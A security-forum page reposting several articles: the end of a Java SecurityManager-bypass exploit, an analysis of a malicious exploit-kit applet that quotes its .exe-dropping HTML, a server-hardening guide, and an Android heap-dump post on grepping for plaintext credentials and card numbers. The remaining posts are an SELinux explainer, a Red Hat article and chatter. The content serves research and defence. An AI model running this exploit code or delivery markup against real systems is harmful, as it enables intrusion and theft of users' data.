= "; for(int i=oldLen; i < oldLen+32; i++) s += toHex(a[i]) + ","; logAdd(s); } else try { // show current SecurityManager logAdd(System.getSecurityManager(), "Security Manager = "); // call System.setSecurityManager(null) ((Statement)oo[2]).execute(); // show results: SecurityManager should be null logAdd(System.getSecurityManager(), "Security Manager = "); } catch (Exception ex) { logError(ex); } logAdd(System.getSecurityManager() == null ? "Ok.":"Fail."); } catch (Exception ex) { logError(ex); } return 0; } private void btnStartMousePressed(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btnStartMousePressed try { logAdd("===== Start ====="); // try several attempts to exploit for(int i=1; i <= 5 && System.getSecurityManager() != null; i++){ logAdd("Attempt #" + i); tryExpl(); } // check results if (System.getSecurityManager() == null) { // execute payload Runtime.getRuntime().exec(_isMac ? "/Applications/Calculator.app/Contents/MacOS/Calculator":"calc.exe"); } logAdd("===== End ====="); } catch (Exception ex) { logError(ex); } }//GEN-LAST:event_btnStartMousePressed // Variables declaration - do not modify//GEN-BEGIN:variables private javax.swing.JButton btnStart; private javax.swing.JScrollPane jScrollPane2; private javax.swing.JTextArea txtArea; // End of variables declaration//GEN-END:variables } Download: http://packetstormsecurity.com/files/download/122865/PSA-2013-0819-1-exploit.tgz Sursa: Packet Storm Exploit 2013-0819-1 - Oracle Java BytePackedRaster.verify() Signed Integer Overflow - Packet Storm
17. [h=1]Android 4.3 and SELinux[/h]Stefano Ortolani Kaspersky Lab Expert Posted August 17, 18:20 GMT Not many weeks ago Google released a new revision of its flagship mobile operating system, Android 4.3. Although some say the updates this time have been quite scarce, from a security perspective there have been some undeniable improvements (among others, the "MasterKey" vulnerability has finally been patched). One of the most prominent is SELinux. Many cheered the event as a long-awaited move, while others criticized its implementation. Personally, I think that the impact is not that easy to assess, especially if we were to question the benefits for end-users. In order to shed some light we can't help but analyze a bit more what SELinux is and what its threat model is. Let's start from the basics: the security of any Linux-based system is built upon the concept of Discretionary Access Control (DAC), meaning that each user decides which of his own files can be accessed (read, written, or executed) by other users. The system itself is protected from tampering by having all system files owned by the administrative user 'root'. Android is based on the very same concepts, but with a small but compelling addition: each app is assigned a different user ID (some exceptions are possible though), thereby isolating and protecting the application data from all other applications. This is the reason why on un-rooted devices it is quite difficult, if not impossible, for a legit application to steal the private data used by another application (unless, obviously, that data is set world-readable).
gattaca Users $ ls -las
total 0
0 drwxr-xr-x 6 root admin 204 Aug 24 2012 .
0 drwxr-xr-x 31 root wheel 1122 Aug 16 12:56 ..
0 -rw-r--r-- 1 root wheel 0 Jun 20 2012 .localized
0 drwxr-xr-x+ 11 Guest _guest 374 Aug 24 2012 Guest
0 drwxrwxrwt 7 root wheel 238 Apr 9 15:58 Shared
0 drwxr-xr-x+ 87 stefano staff 2958 Aug 11 10:35 stefano
DAC means that access to files and resources is defined in terms of users and file/directory modes. SELinux builds on top of that (and on 15 years of NSA's OS security research) and introduces another security layer termed Mandatory Access Control (MAC). This layer, configured by system-wide policies, further regulates how users (and thus apps on Android devices) access both their own and the system-provided data, all in a transparent manner. In more technical terms, it is possible to design policies that specify which interactions a process assigned to a security context may and may not perform. A simple but effective example is the case of a system log daemon running with root privileges (ouch). With SELinux we can configure the entire system such that the process can not access anything but the log file: we would simply need to assign a specific label to the log file, and write a policy allowing the log daemon to access only files so labeled (as always, things are a bit more complex than that in practice). Note the two advantages coming from this mindset: (1) the policy is something that can be enforced system-wide (and even root has to abide by it); (2) the permissions are much more fine-grained than those possibly enforced by the DAC. The ability to limit what the super-user can do (regardless of its privileges) is pivotal to protect the system from privilege escalation attacks. This is in fact where SELinux excels. Let's take the case of Gingerbreak, a widespread exploit to root Gingerbread-based devices. The exploit sends a carefully crafted netlink message to the volume daemon (vold) running as root. Due to some missing bounds checks that message can lead to successful code injection and execution.
Since the process runs as root, it is in fact trivial to spawn a setuid-root shell and from there take control of the device. SELinux would have stopped that exploit by denying the very same message: the default policy (at least in the original patch-set) denies opening that type of socket, so problem solved. If that was not enough, execution of non-system binaries through that daemon process can be further denied by another SELinux policy.
shell@tilapia:/ # ls -Z /system/
drwxr-xr-x root root u:object_r:unlabeled:s0 app
drwxr-xr-x root shell u:object_r:unlabeled:s0 bin
drwxr-xr-x root root u:object_r:unlabeled:s0 etc
...
Unlabeled FS after OTA update.
Awesome, right? Unfortunately, reality is still quite far from that. The SELinux implementation that is currently deployed on stock Android 4.3 images is missing several important features. First off, SELinux is configured in Permissive mode only, meaning that policies are not enforced and violations are merely logged (useful for testing, not much else). Also, as shown above, the OTA update does not label the system partition correctly (my testing device left me puzzled for quite a while until I found that the researcher Pau Oliva had published the exact same finding at DEF CON 21), meaning that a stock restore is mandatory if a developer is to test it. Finally, besides the fact that the provided policies are anything but restrictive, no MAC is available for the Android middleware (a feature that is instead part of the NSA's patch-set). What does it mean to the end-user then? Unfortunately, as of now, not much. SELinux as deployed on Android 4.3 can only be tested and policies developed. There is also no safe way to enforce it. Now it is the OEM vendors' turn. Google is strongly encouraging the development of SELinux implementations (BYOD anyone?)
based on stock functionalities rather than on poorly assembled add-ons (see again the talk given at DEFCON 21 for a comprehensive explanation of what "implementation issues" might mean). Developers, on the other hand, are strongly encouraged to get accustomed to the default set of policies and test their apps for breakage. Will we ever see an Android release with SELinux set to enforcing mode? We can only hope. Sursa: https://www.securelist.com/en/blog/9175/Android_4_3_and_SELinux
  18. Anti-decompiling techniques in malicious Java Applets Step 1: How this started While I was investigating the Trojan.JS.Iframe.aeq case (see blogpost < http://www.securelist.com/en/blog?weblogid=9151>) one of the files dropped by the Exploit Kit was an Applet exploiting a vulnerability: <script> document.write('<applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"><param value="http://fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" name="kYtNtcpnx"/></applet>'); </script> Step 2: First analysis So basically I unzipped the .jar and took a look using JD-GUI, a java decompiler. These were the resulting classes inside the .jar file: The class names are weird, but nothing unusual. Usually the Manifest states the entry point (main class) of the applet. In this case there was no manifest, but we could see this in the applet call from the html: <applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"> << Package and Class to execute <param value="http:// fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" The third parameter was the .exe that the applet drops. There was no real need to explore any more deeply just to get an overview of what the applet does. However the point here was to analyze the vulnerability that this .jar file exploits. At this point I should say that I was biased. 
I had read a McAfee report (http://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/24000/PD24588/en_US/McAfee_Labs_Threat_Advisory_STYX_Exploit_Kit.pdf) about a similar campaign using the same Exploit kit. In this report they said that the malware dropped by this particular HTML inside the kit was CVE-2013-0422. Usually the first clue which might confirm this would be verdicts from AV vendors, but this time it was not the case: https://www.virustotal.com/es/file/e6e27b0ee2432e2ce734e8c3c1a199071779f9e3ea5b327b199877b6bb96c651/analysis/1375717187/ Ok, so let's take a look at the decompiled code, starting from the entry point. We can confirm that the ZqnpOsRRk class is implementing the Applet: package QPAfQoaG; import java.applet.Applet; import java.lang.reflect.Constructor; import java.lang.reflect.Method; public class ZqnpOsRRk extends Applet But quickly we see that something is not working. The names of the classes and methods are random and the strings obfuscated, but this is nothing to worry about.
However in this case we see that the decompiler is showing strange “code”: public ZqnpOsRRk() { (-0.0D); return; 1L; 2; 1; } Or it is not able to decompile methods of the class directly and just shows the bytecode as comments: public void ttiRsuN() throws Throwable {// Byte code: // 0: ldc_w 10 // 3: iconst_4 // 4: ineg // 5: iconst_5 // 6: ineg // 7: pop2 // 8: lconst_0 // 9: pop2 Now I started to wonder: how bad was the situation? Could I still get enough information to discover which CVE is exploited by this .jar? Time for some serious digging! I started to rename the classes based on their first letters (ZqnpOsRRk to Z, CvSnABr to C, etc.) and to match the methods with what I thought they were doing. It’s much like any RE using IDA. There was a lot of “strange” code around, which got strange interpretations from the decompiler. I decided to delete it to tidy up the task. Of course, there was a risk that I might delete something important, but this time it looked like misinterpretations of the bytecode, dead code and unused variables. So I deleted things like: public static String JEeOqvmFU(Class arg0) { (-5); (-2.0F); return 1; } Where I saw commented bytecode (not decompiled by JD-GUI), I deleted everything but the references to functions/classes. At the end I had much cleaner code, but I was very worried that I might be missing important parts. For instance, I had procedures which just returned NULL, functions which just declared variables, unused variables, etc. How much of this, if any, was part of the exploit and how much was just badly interpreted code? At least I was able to get something useful after cleaning the code.
I was able to localize the function used to deobfuscate the strings: public static String nwlavzoh(String mbccvkha) { byte[] arrayOfByte1 = mbccvkha.getBytes(); byte[] arrayOfByte2 = new byte[arrayOfByte1.length]; for (int i = 0; i < arrayOfByte1.length; i++) arrayOfByte2[i] = ((byte)(arrayOfByte1[i] ^ 0x44)); return new String(arrayOfByte2); } Not exactly rocket science. Now I could decompile all the strings, but I still didn't have a clear idea of what was happening in this .jar. Step 3: Different strategy Seeing that the code was not decompiled properly, I remembered that to check which vulnerability is being exploited you don’t really need fully decompiled code. Finding the right clues can point you to the right exploit. At this point I thought that it might be CVE-2013-0422, so I decided to get more information about this vulnerability and see if I could find something in the code to confirm this. This CVE was discovered in January 2013. Oracle was having a bad time just then, and shortly afterwards a few other Java vulnerabilities were exposed. I downloaded a few samples from VirusTotal with this CVE. All of them were easily decompiled and I saw some ways to implement this vulnerability. But there was no big clue. I also decided to try a few other decompilers, but still got no results. However, when taking a second look at the results of running a now-obsolete JAD, I saw that the decompiled code was quite different from JD-GUI's, even though it was still incomplete and unreadable. But there were different calls with obfuscated strings to the deobfuscation function. The applet uses a class loader with the obfuscated strings to avoid detection, making it difficult to know what it is loading without the properly decompiled strings. But now I had all of them!
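Since the transform is just a single-byte XOR, a standalone decoder is easy to write outside Java. Here is a minimal Python sketch of the same logic (the function name mirrors the Java original; the sample string is purely illustrative and not taken from the applet):

```python
def nwlavzoh(s: str) -> str:
    """Apply the applet's string transform: XOR every byte with 0x44."""
    return bytes(b ^ 0x44 for b in s.encode("latin-1")).decode("latin-1")

# XOR with a constant key is its own inverse, so the very same
# function both obfuscates and deobfuscates a string.
obfuscated = nwlavzoh("java.lang.System")
print(nwlavzoh(obfuscated))  # prints "java.lang.System"
```

Because XOR is involutive, one such routine is enough to recover every obfuscated string the applet passes to its class loader.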
After running the script I got:
com.sun.jmx.mbeanserver.JmxMBeanServer
newMBeanServer
javax.management.MbeanServerDelegate
boolean
getMBeanInstantiator
findClass
sun.org.mozilla.javascript.internal.Context
com.sun.jmx.mbeanserver.Introspector
createClassLoader
Now this was much clearer and more familiar to me. I had another look at one of the PDFs I was just reading and bingo! https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf So finally I could confirm the CVE was indeed CVE-2013-0422. Step 4: Why didn’t the Java Decompiler work? In these cases it is always possible to take another approach and do some dynamic analysis, debugging the code. If you want to go this way I recommend reading this for the setup: Understanding Java Code and Malware | Malwarebytes Unpacked However, I couldn't stop thinking about why all the decompilers failed with this code. Let's take a look at the decompiled bytecode manually. We can easily get it like this: javap -c -classpath LOCAL_PATH ZqnpOsRRk > ZqnpOsRRk.bytecode Let's take a look at the code we get and what it means, with an eye on the decompiled code. We will need this: Java bytecode instruction listings - Wikipedia, the free encyclopedia public QPAfQoaG.ZqnpOsRRk(); 0: aload_0 1: invokespecial #1; //Method java/applet/Applet."<init>":()V 4: dconst_0 << push 0D 5: dneg << -0D 6: pop2 << pop -0D 7: nop 8: return 9: lconst_1 <<deadcode_from_here 10: pop2 11: goto 14 14: iconst_2 15: iconst_2 16: pop2 17: iconst_1 18: pop and the decompiled code with the corresponding instruction numbers: public class ZqnpOsRRk extends Applet { public ZqnpOsRRk() { (-0.0D); return; 1L; 2; 1; } So we can see how a method that does nothing but return leaves a lot of garbage in the middle. The decompiler cannot handle this and tries to interpret all these operations, these anti-decompilation artifacts. It just adds a lot of extra noise to the final results. We can safely delete all this.
public class ZqnpOsRRk extends Applet { public ZqnpOsRRk() { return; } There are TONS of these artifacts in the bytecode. Here are a few examples: 1: lconst_0 2: lneg 3: pop2 1: iconst_5 2: ineg 3: iconst_1 4: ineg 5: pop2 1: iconst_5 2: ineg 3: iconst_5 4: swap 5: pop2 There are also a lot of nonsense jumps, such as push NULL then jump if null, gotos and nops. Basically it’s difficult to delete these constructs from the bytecode because the parameters are different and don’t always throw up the same opcodes. It’s up to the decompiler to get rid of this dead code. After a couple of hours manually cleaning the code and reconstructing it from the bytecodes, I could finally read the result and compare it with the original decompiled one. Now that I understood what was happening and what was wrong with the original code, I could safely delete the dead code and introduce readable names for classes and methods. But there was still one unanswered question: why was the first decompiler unable to deobfuscate all the strings, and why did I have to use JAD to get everything? JD-GUI returns the bytecode of the methods that it cannot decompile, but for instructions such as ldc (which puts a constant onto the stack) it does not include the constant along with the instruction in the output code. That's why I couldn't get them until I used a second decompiler. For example: JD-GUI output: // 18: ldc 12 Bytecode output: 18: ldc #12; //String '+)j71*j.)<j)&!%*7!62!6j^N)<t^F!%*^W!62!6 JAD output: class1 = classloader.loadClass(CvSnABr.nwlavzoh("'+)j71*j.)<j)&!%*7!62!6j16)<t06!%*27!62!6")); In the bytecode, happily, we can find all these references and complete the job. Final thoughts When I was working on this binary I remembered a presentation at BH 2012 about anti-decompiling techniques used for Android binaries. This was the first time I had personally encountered a Java binary implementing something similar.
Even though they are not that difficult to work around, the analysis is much slower and big binaries can be really hard to crack. So there are two open questions: first, what can be done, from the decompiler’s perspective, to defeat these tricks? I’m hoping to discuss this with the authors of JD-GUI. Secondly, how can we make code “undecompilable”? Are there automatic tools for this? Again, I’m hoping to find out more, but please contact me if you have anything useful to share. Sursa: https://www.securelist.com/en/analysis/204792300/Anti_decompiling_techniques_in_malicious_Java_Applets
19. WEB SERVER SECURITY Rohit Shaw August 16, 2013 This article gives you a short and understandable summary of web servers, the different types of servers, the security add-on software installation process, and security aspects. In this article we will learn how to install a control panel and the benefits of add-on security software. Web servers, just as a general introduction, are the big computers that serve as website hosts for a particular organization. The common characteristics that web servers have are public IP addresses and domain names. This information may sound basic, but it is offered for beginners. Security hardening is a practice that has developed to protect the web server from intrusions, hacking attempts, and other malicious uses. A brief introduction to the types of web servers: there are those based on Microsoft Windows and those based on Linux, most commonly Microsoft IIS Server and Apache respectively (these are the most widespread, although there are others like Nginx, Cherokee, Zeus, etc.). Throughout my article, I will introduce techniques for hardening a web server, which plays a chief role in web server security. The attack vectors on a web server depend both on the security of the web applications hosted on the server and on the security of the server itself (which includes operating system hardening, application server hardening, etc.). Starting with the web server security, the first point of analysis for exploiting the server would be the services. I would suggest that all server security administrators run a scan to check which ports are open, filtered, and closed. One of the best tools for scanning the network would be Nmap. Use a control panel for managing the hosted websites on the server. There are many control panels available, such as cPanel, Parallels Plesk, DirectAdmin, Webmin, ISPconfig, Virtualmin, etc.
The chief benefit of using a control panel is that it provides a graphical web-based interface. It is extremely easy to navigate, with an icon-based menu on the main page. A server administrator can use a control panel to set up new websites, email accounts, and DNS entries. With the control panel, you can also upgrade and install new software. After that, install Atomic Secured Linux (ASL) on your web server; it is an add-on for Linux systems. We will discuss ASL later in this article. Now I am going to show you how to set up a control panel on a web server. Here we are going to install cPanel and WHM (Web Host Manager). cPanel Setup Manual Prerequisites: Before installing cPanel we need to fulfill some conditions: Your IP must be static before purchasing cPanel. It will not work properly with a dynamic IP address. The hostname on your server must be a fully qualified host name (FQHN); for example, web.domain.com. You can change the "hostname=" line in /etc/sysconfig/network and then you must restart your network. Hostname Change: For changing the host name, there are usually three steps, as follows:
1. Sysconfig/Network—Open the /etc/sysconfig/network file with any text editor. Modify the HOSTNAME= value to match your FQHN host name. # vi /etc/sysconfig/network HOSTNAME=myserver.domain.com
2. Host file—Change the host entry that is associated with the main IP address of your server; this is for internal networking. (Found at /etc/hosts)
3. Run hostname—This command allows modifying the hostname on the server, but it will not actively update all programs that are running under the old hostname.
Restart Networking: After completing the above prerequisites and requirements, we simply restart networking so the changes take effect.
We can restart networking with this command: # /etc/init.d/network restart Downloading cPanel: After registering your IP, we have to input a command as root user in the terminal; that is, wget http://www.layer1.cpanel.net/latest cPanel Installation: After downloading the installer file, type in the following command as root user: sh latest After the install is complete, you should see this: “cPanel Layer 2 install complete.” Now point your web browser to port 2086 or 2087 by providing your IP address directly in the web browser: https://youriphere:2087 NOTE: There is no method of uninstalling cPanel. You will have to reload the operating system. Now, after installing cPanel, the server is safer from rooting attacks, which hackers use for compromising all websites that are hosted on the same server. But the main critical threats are PHP shell execution and DDoS attacks on the server, which are not prevented by cPanel. So we started looking for an anti-DDoS solution on the Internet and we found one, called Atomic Secured Linux. Atomic Secured Linux Atomic Secured Linux is an easy-to-use, out-of-the-box unified security suite add-on for Linux systems, designed to protect servers against zero-day threats. Unlike other security solutions, ASL is designed for beginners and experts alike. You just install ASL on your existing system and it does all the work for you. ASL works by combining security at all layers, from the firewall to the applications and services and all the way down to the kernel, to provide the most complete multi-spectrum protection solution available for Linux servers today. It helps to ensure that your system is secure and also compliant with commercial and government security standards.
Features:
Complete intrusion prevention
Stateful firewall
Real-time shunning/firewalling and blocking of attack sources
Brute force attack detection and prevention
Automatic self-healing system
Automated file upload scanning protection
Built-in vulnerability and compliance scanner and remediation system
Suspicious event detection and notification
Denial of service protection
Malware/antivirus protection
Auto-learning role-based access control
Data loss protection and real-time web content redaction system
Automated secure log management with secure remote logging
Web-based GUI management
Kernel protection
Built-in virtualization
Auto healing/hardening
Atomic Secured Linux works on various platforms, such as CentOS, Red Hat Enterprise Linux, Scientific Linux, Oracle Linux, and Cloud Linux. It also supports many control panels, including cPanel, Virtualmin, DirectAdmin, Webmin, and Parallels Plesk. Now I am going to show you how to install Atomic Secured Linux. It is quite easy to install. Open a root terminal and type in: wget -q -O - https://www.atomicorp.com/installers/asl | sh Follow the instructions in the installer, being sure to answer the configuration questions appropriately for your system. Once the installation is complete, you will need to reboot your system to boot into the new hardened kernel that comes with ASL. You do not have to use this kernel to enjoy the other features of ASL, but we recommend that you use it, because it includes many additional security features that are not found in non-ASL systems. Now log in to your GUI at https://youriphere:30000. You can view alerts, block attackers, configure ASL, and use its many features from the GUI. It protects from cross-site scripting, SQL injection, remote code inclusion, and many other web-based attacks. It intelligently detects search engines to prevent accidental blocking of web crawlers.
It detects suspicious and important events and sends alerts about things such as privilege escalation, software installation and modification, file privilege changes, and more. ASL detects suspicious processes, files, user actions, hidden ports, kernel activity, open ports, and more. It has a built-in vulnerability and compliance scanner and remediation system to ensure that your system is operating in a safe, secure, and compliant manner. It automatically hardens Linux servers based on security policies and ships with a world-class set of policies developed by security experts. Also, it automatically disables unsafe functions in web technologies such as PHP to help prevent entire classes of vulnerabilities; for example, executing PHP shells. It detects and blocks brute force and “low and slow” attacks on web applications and intelligently identifies when a web application has denied access, even for login failures. Alerting is done for all domains hosted on a server. The graphical user interface of the firewall is easy to use and maintain. The advanced configuration of ASL allows handling PHP shell functions, antivirus, mod_security rules, rootkit hunter, etc. Hence we conclude that, after doing these things, your web server will be secured against attacks. Nowadays, most of the websites that get hacked are hosted on shared servers. An attacker’s main method is to upload a PHP shell to a web server through a vulnerable website, from which he can deface all websites hosted on that server. That’s why we suggest using cPanel: cPanel provides separate accounts for all website owners, so if an attacker can upload a PHP shell through one website, he will not have access to all the other websites hosted on that server; he can only deface that particular site.
Specifically, it blocks PHP shell functions and prevents PHP shells from executing on the web server.

References
- CentOS/REL - Installing cPanel & WHM 11.24 | Knowledge Center | Rackspace Hosting
- https://www.atomicorp.com/products/asl.html

Sursa: WEB SERVER SECURITY
  20. x86 Code Virtualizer Src Fh_prg Hello everybody. Here is my code virtualizer source code, now public. Download and enjoy. Attached Files VM.zip (153.9 KB, 48 views) Sursa: x86 Code Virtualizer Src
  21. rstforums.com/forum/74095-coca-cola-666-a.rst OMG, RST is possessed! FALSE. We are the devils; we cannot be possessed.
  22. Great, I hope some of them will be open-source.
  23. Everyone is coming to the South.
  24. Red Hat CEO: Go Ahead, Copy Our Software

While most companies fight copycats, Red Hat embraces its top clone, CentOS. Here's how that helps it fight real enemies like VMware.

Matt Asay August 13, 2013

Imagine your company spent more than $100 million developing a product. Now imagine that a competitor came along and cloned your product and distributed a near-perfect replica of it. Not good, right? If you're Apple, you spend years and tens of millions of dollars fighting it, determined to be the one and only source of your product. If you're Red Hat, however, you embrace it—as Red Hat CEO Jim Whitehurst told ReadWrite in an interview.

After Unix

For years the enterprise data center was defined by expensive hardware running varieties of the Unix operating system. Over time, both Windows and Linux chewed into Unix's market share, with Red Hat winning the bulk of the Linux spoils. The key to victory? Both Windows and Linux offered low-cost, high-value alternatives to Unix's sky-high pricing. With Unix cowering in a corner, one would think that the battle would shift to Linux versus Windows. The reality, however, is somewhat different. As Whitehurst tells it, Red Hat "certainly competes" with Microsoft, but "generally those IT decisions are made at the architecture level before you get into a specific Linux versus Windows bake-off." Today enterprise architecture tends to be Linux-based, while 10 years ago it was Windows, which means that more often than not, Red Hat Enterprise Linux is baked into enterprise IT decisions. "Going forward with new workloads, they are heavily Linux-based," notes Whitehurst. As such, Whitehurst doesn't "worry about Microsoft long-term, because it's Red Hat and VMware that are defining future data center strategy."

Taking On VMware

Ah, yes, VMware. Sun Microsystems, in its day the leading Unix vendor but now swallowed up by Oracle, once provided Red Hat with a handy villain to target. 
Today data-center software maker VMware is Red Hat's Enemy Number One. The reason is simple: No other company more closely matches Red Hat's ambitions, albeit with a very different approach. As Whitehurst emphasizes, "When you start thinking about where the future of the data center is going, VMware has a similar view to ours, but they're doing it with a proprietary innovation model and we're open." How open? So open that not only is Red Hat fighting VMware with its own open-source products, but it's also embracing clones like CentOS. While open source is increasingly established within the technology world, few understand its implications for an open-source software business. In the case of Red Hat, it develops the popular Red Hat Enterprise Linux (RHEL) operating system. But because Linux is a community-developed OS, Red Hat must release all of its Linux code to others. (Instead of charging for a software license per se, Red Hat has customers pay for a subscription that covers services and support.) This paves the way for an organization like CentOS to develop "a Linux distribution derived from ... a prominent North American Enterprise Linux vendor" which "aims to be 100% binary compatible" with that Linux vendor. It's the imitator that dare not speak its name, but everyone knows CentOS is a like-for-like Red Hat clone. How can this possibly be good for Red Hat?

Embracing The Parasite

While some like Microsoft have threatened Red Hat with the specter of even greater competition from CentOS, Whitehurst argues that CentOS "plays a very valuable role in our ecosystem." How? By ensuring that Red Hat remains the Linux default:

CentOS is one of the reasons that the RHEL ecosystem is the default. It helps to give us an ubiquity that RHEL might otherwise not have if we forced everyone to pay to use Linux. So, in a micro sense we lose some revenue, but in a broader sense, CentOS plays a very valuable role in helping to make Red Hat the de facto Linux. 
But couldn't another Linux vendor like SuSE or Canonical, the primary backer of Ubuntu, undercut Red Hat with an equally free OS? If $0 is the magic price point, other Linux vendors can easily match that, right? Whitehurst responds: "SuSE often comes in at a lower price point than RHEL, but most people would prefer to have a common code base like RHEL plus CentOS than a cheaper but always fee-based enterprise SuSE." In other words, only Red Hat can offer the industry's leading Linux server OS and also offer—albeit indirectly—that same product for free. Microsoft has tacitly acknowledged a similar phenomenon: While the company spends heavily to fight piracy, founder Bill Gates noted in 1998 that illegal copies of its Windows operating system in China helped seed demand for the paid version. While I'm sure Red Hat's sales force doesn't love competing with its copycat, the reality is that sales are almost certainly helped in accounts that only want RHEL for production servers and can shave costs by using CentOS for development and test servers. CentOS, in other words, gives Red Hat a lot of pricing leverage without having to lower its prices.

Embracing Developers

Arguably one critical area where CentOS hasn't helped Red Hat is with developers. While developers want the latest and greatest technology, Red Hat's bread-and-butter audience over the years has been operations departments, which want stable and predictable software. (Read: boring.) CentOS, by cloning RHEL's slow-and-steady approach to Linux development, is ill-suited to attracting developers. So Red Hat is trying something different, dubbed Red Hat Software Collections. Collections includes "a collection of refreshed and supported web/dynamic languages and databases for Red Hat Enterprise Linux." Basically, Collections gives developers a faster-moving development track within slower-moving RHEL. 
Or, as Whitehurst tells it, "Collections is Red Hat's way of embracing developers while keeping its appeal for operations." It will be interesting to see how this plays out. Red Hat has a long way to go in its goal to define the open data center, but with its embrace of CentOS to give it licensing leverage and of Collections to give it developer credibility, Red Hat is on the right track. Sursa: http://readwrite.com/2013/08/13/red-hat-ceo-centos-open-source
  25. [h=1]Poking Around in Android Memory[/h] Tags: memory, analysis, mobile, programming, public — etienne @ 16:31

Taking inspiration from Vlad's post, I've been playing around with alternate means of viewing traffic/data generated by Android apps. The technique that has given me the most joy is memory analysis. Each application on Android is run in the Dalvik VM and is allocated its own heap space. Android being Android, free and open, numerous ways of dumping the contents of the application heap exist. There's even a method for it in the android.os.Debug library: android.os.Debug.dumpHprofData(String filename). You can also cause a heap dump by issuing the kill command:

kill -10 <pid number>

But there is an easier way: use the official Android debugging tools. The Dalvik Debug Monitor Server (DDMS) "provides port-forwarding services, screen capture on the device, thread and heap information on the device, logcat, process, and radio state information, incoming call and SMS spoofing, location data spoofing, and more." Once DDMS is set up in Eclipse, it's simply a matter of connecting to your emulator, picking the application you want to investigate and dumping the heap (hprof).

1.) Open DDMS in Eclipse and attach your device/emulator
* Set your DDMS "HPROF action" option to "Open in Eclipse" - this ensures that the dump file gets converted to standard Java hprof format and not the Android version of hprof. This allows you to open the hprof file in any Java memory viewer.
* To convert an Android hprof file to Java hprof, use the hprof converter found in the android-sdk/platform-tools directory:

hprof-conv <infile> <outfile>

2.) Dump hprof data
Once DDMS has done its magic, you'll have a window pop up with the memory contents for your viewing pleasure. You'll immediately see that the application's UI objects and other base classes are in the first part of the file. Scrolling through, you will start seeing the values of variables stored in memory. 
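As an aside on the `kill -10` trick above: 10 is SIGUSR1 on Linux, and the Dalvik runtime installs a handler for that signal which writes the hprof file. The mechanism can be mimicked with an ordinary shell process and a trap; the "dump" written here is obviously a stand-in for what Dalvik actually does:

```shell
#!/bin/sh
# Illustrate the signal mechanism behind "kill -10 <pid>": install a
# USR1 handler that "writes a dump", then deliver the signal.
rm -f dump.log
(
  trap 'echo "pretend heap dump written" > dump.log' USR1
  # Wait until the handler has fired (stand-in for a long-running app);
  # the counter bounds the wait so the loop cannot spin forever.
  i=0
  while [ ! -s dump.log ] && [ "$i" -lt 100 ]; do sleep 0.1; i=$((i+1)); done
) &
pid=$!

sleep 0.3            # give the subshell time to install its trap
kill -10 "$pid"      # the same signal Dalvik interprets as "dump the heap"
wait "$pid"
cat dump.log
```

On a device the analogous steps would be finding the app's pid (e.g. via ps) and sending it signal 10, after which Dalvik writes the dump for later retrieval.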
To get to the interesting stuff we can use the command line.

3.) strings and grep the .hprof file (easy stuff)
To demonstrate the usefulness of memory analysis, let's look at two finance-oriented apps. The first application is a mobile wallet application that allows customers to easily pay for services without having to carry cash around. Typically one would do some static analysis of the application, and then for dynamic analysis you would use a proxy such as Mallory or Burp to view the network traffic. In this case that wasn't possible, as the application employed certificate pinning and any attempt to man-in-the-middle the connection caused the application to exit with a "no network connection" error.

So what does memory analysis have to do with network traffic? As it turns out, a lot. Below is a sample of the data extracted from memory:

And there we have it: the user login captured, along with the username and password in the clear. Through some creative strings and grep we can extract a lot of very detailed information. This includes credit card information, user tokens and products being purchased. Despite not being able to alter data in the network stream, it is still easy to view what data is being sent, all without worrying about intercepting traffic or decrypting the HTTPS stream.

A second example application examined was a banking app. After spending some time using the app and then dumping the hprof, we used strings and grep (and some known data) to easily see what is being stored in memory:

strings /tmp/android43208542802109.hprof | grep '92xxxxxx'

Using part of the card number associated with the banking app, we can locate any references to it in memory. And we get a lot of information...

And there we go: a fully "decrypted" JSON response containing lots of interesting information. Grep'ing around yields other interesting values, though I haven't managed to find the login PIN yet (a good thing, I guess). Next step? 
Find a way to cause a memory dump in the banking app from another app on the phone, extract the necessary values, steal the banking session, profit. Memory analysis provides an interesting alternate means of finding data within applications, as well as allowing analysts to decipher how an application operates. The benefits are numerous, as the application "does all the work" and there is no need to intercept traffic or figure out the decryption routines used.

[h=3]Appendix:[/h]
The remoteAddress field in the response is very interesting, as it maps back to a range owned by Merck (one of the largest pharmaceutical companies in the world). No idea what it's doing in this particular app, but it appears in every session I've looked at.

- See more at: SensePost Blog
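A footnote to the post above: the strings-and-grep workflow needs nothing Android-specific once the dump is on disk. A self-contained sketch of the pipeline; the dump file is fabricated here so it can be demonstrated without a real heap dump, and the field names are made up, since every app lays out its memory differently:

```shell
#!/bin/sh
# Fabricate a tiny "dump" of printable runs separated by NUL bytes,
# standing in for a converted .hprof file from DDMS/hprof-conv.
printf 'hdr\0user=alice&pass=s3cret\0card=9212345678\0' > dump.hprof

# Pull out printable strings and filter for interesting values, just
# as with a real heap dump.
strings dump.hprof | grep 'pass='   # credentials left behind in memory
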